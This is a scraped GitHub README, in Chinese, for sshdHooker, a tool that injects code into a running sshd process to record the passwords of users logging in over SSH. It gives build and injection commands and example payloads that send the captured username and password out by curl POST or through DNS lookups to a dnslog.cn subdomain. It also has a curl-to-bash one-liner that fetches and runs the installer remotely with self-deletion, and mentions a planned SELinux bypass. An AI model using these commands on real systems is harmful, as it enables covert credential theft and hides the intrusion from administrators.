timwhitez starred sshdHooker
2023-1-5 16:24:8 Author: github.com(查看原文) 阅读量:34 收藏

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 1 tag

Code

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

注入SSHD之后就能记录下密码或者做其他操作。

需要关闭selinux

auto installer

密码记录器一键安装,仅暂时支持x64

直接执行命令

直接运行后ssh密码登录,记录地址为/tmp/.password.txt,默认so地址为/tmp/hello.so

其他参数:

    -e   修改so文件的路径,默认/tmp/hello.so
    -o   修改注入器的路径,默认/tmp/.i.
    -m   修改mode默认值为0,输出到文件,默认记录地址为/tmp/.password.txt ,如果值为1,则会改为命令行模式
    -p   修改payload,默认值为/tmp/.password.txt,如果mode值为1,则会使用snsprintf来格式化命令并且输出,请确保字符串中包含两个%s,用于格式化用户名和密码
    -d   自动删除,设置为anyone则抓到密码后立刻删除,否则则抓取到设置的指定用户名后删除

例子

https发送密码

bash install.sh -p "curl -X POST -d 'username=%s\&password=%s' http://127.0.0.1" -m 1

dns发送密码并且自动删除

bash install.sh -p 'ping `echo %s-%s|xxd -ps`.k9lovy.dnslog.cn -c 1' -m 1 -d anyone

远程快速自动部署并自动删除

curl -L https://github.com/9bie/sshdHooker/releases/download/release/sshdHooker.sh | bash -s -- -d anyone

debug

执行

gcc -shared inject_got.c -ldl -fPIC -o test2.so -std=c99

mv test2.so /tmp/hello.so

gcc sshdHooker.c utils.c shellcode.s -g -o inject -ldl -lpthread

sudo ./inject sshd_pid

然后等待用户连接SSH并且登录成功,密码保存于/tmp/.password.txt

  • 增加x86/arm支持
  • 自定义so路径
  • dns/icmp/https发送
  • bypass SELINUX

文章来源: https://github.com/9bie/sshdHooker
如有侵权请联系:admin#unsafe.sh